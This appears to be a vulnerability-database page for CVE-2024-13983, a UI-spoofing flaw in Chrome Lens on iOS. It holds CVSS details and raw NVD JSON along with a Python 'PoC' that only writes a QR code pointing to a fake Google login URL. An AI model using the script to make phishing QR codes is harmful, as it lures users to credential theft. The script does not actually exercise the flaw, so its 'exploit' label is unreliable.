Security Vulnerability Report
中文
CVE-2024-13983 CVSS 6.3 MEDIUM

CVE-2024-13983

Published: 2025-11-14 03:15:55
Last Modified: 2025-11-17 12:25:00

Description

Inappropriate implementation in Lens in Google Chrome on iOS prior to 136.0.7103.59 allowed a remote attacker to perform UI spoofing via a crafted QR code. (Chromium security severity: Low)

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome iOS < 136.0.7103.59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import qrcode from PIL import Image def generate_malicious_qr(): """ Generate a malicious QR code that exploits CVE-2024-13983 UI Spoofing vulnerability in Google Chrome iOS Lens """ # Malicious URL that will be rendered in Lens # This simulates a phishing site disguised as legitimate malicious_url = "https://fake-google-login.com/search?q=malicious" # Generate QR code qr = qrcode.QRCode( version=1, error_correction=qrcode.constants.ERROR_CORRECT_L, box_size=10, border=4, ) qr.add_data(malicious_url) qr.make(fit=True) img = qr.make_image(fill_color="black", back_color="white") img.save("CVE-2024-13983_poc.png") print(f"Malicious QR code generated: CVE-2024-13983_poc.png") print(f"URL encoded: {malicious_url}") print("When scanned with Chrome iOS Lens, this QR code may display a spoofed UI") if __name__ == "__main__": generate_malicious_qr()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-13983", "sourceIdentifier": "[email protected]", "published": "2025-11-14T03:15:55.380", "lastModified": "2025-11-17T12:24:59.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Lens in Google Chrome on iOS prior to 136.0.7103.59 allowed a remote attacker to perform UI spoofing via a crafted QR code. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "136.0.7103.59", "matchCriteriaId": "D17DB57F-A41C-4EED-A254-FC88BF42FBB6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:iphone_os:-:*:*:*:*:*:*:*", "matchCriteriaId": "B5415705-33E5-46D5-8E4D-9EBADC8C5705"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/04/stable-channel-update-for-desktop_29.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/379818904", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}